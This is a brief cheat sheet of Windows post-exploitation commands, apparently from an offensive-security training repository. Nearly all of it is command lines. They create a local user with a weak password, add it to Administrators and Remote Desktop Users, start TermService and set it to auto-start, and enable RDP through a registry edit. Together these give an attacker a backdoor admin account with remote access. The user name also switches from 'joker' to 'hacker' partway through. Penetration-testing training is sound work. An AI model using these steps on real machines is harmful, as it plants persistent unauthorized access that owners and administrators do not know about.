h4cker/post_exploitation/misc-windows-post-exploitation.md
2021-07-18 23:33:45 -04:00

818 B

Misc Windows Post Exploitation Tasks

Adding a Windows User (joker):

net user /add joker password123

Adding a user to the Administrators groups

net localgroup administrators /add joker

Adding a user to the Remote Desktop user group

net localgroup "Remote Desktop users" hacker /add

Starting the Remote Desktop service

net start TermService

Verifying if the Remote Desktop Service is active and running

tasklist /svc | findstr /C:TermService

Permanently enable Terminal Services

sc config TermService start=auto

Enabling Terminal services via the registry

Note: You need to reboot after invoking this...

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f